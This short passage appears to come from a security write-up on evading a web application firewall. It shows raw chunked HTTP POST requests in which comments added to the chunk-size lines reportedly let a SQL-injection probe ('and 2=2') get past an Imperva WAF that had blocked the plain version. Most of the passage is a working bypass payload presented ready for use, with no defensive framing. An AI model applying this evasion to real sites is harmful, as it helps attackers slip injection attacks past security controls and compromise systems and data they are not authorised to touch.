At this time, if you try to bypass the conventional chunked transmission method directly, Will be directly identified and blocked by WAF.
Almost all WAFs that can identify a Transfer-Encoding packet, but some do not process the comment at the length identifier in the packet. As a result, if a comment is added to the packet, the WAF will not recognize the packet.
Now we are testing regular block transfer packets on a website:
POST /xxxxxx.jsp HTTP/1.1
......
Transfer-Encoding: Chunked
9
xxxxxxxxx
9
xx=xxxxxx
9
xxxxxxxxx
1
d
9
&a=1 and
3
2=2
0
The returned results are shown in the following figure
You can see that our attack payload "and 2 = 2" was intercepted by Imperva's WAF.
At this time, we add the block transmission packet with a comment.
POST /xxxxxx.jsp HTTP/1.1
......
Transfer-Encoding: Chunked
9
xxxxxxxxx
9
xx=xxxxxx
9
xxxxxxxxx
1;testsdasdsad
d
9;test
&a=1 and
3;test44444
2=2
0
The returned results are shown in the following figure.
You can see that the firewall has stopped intercepting this payload.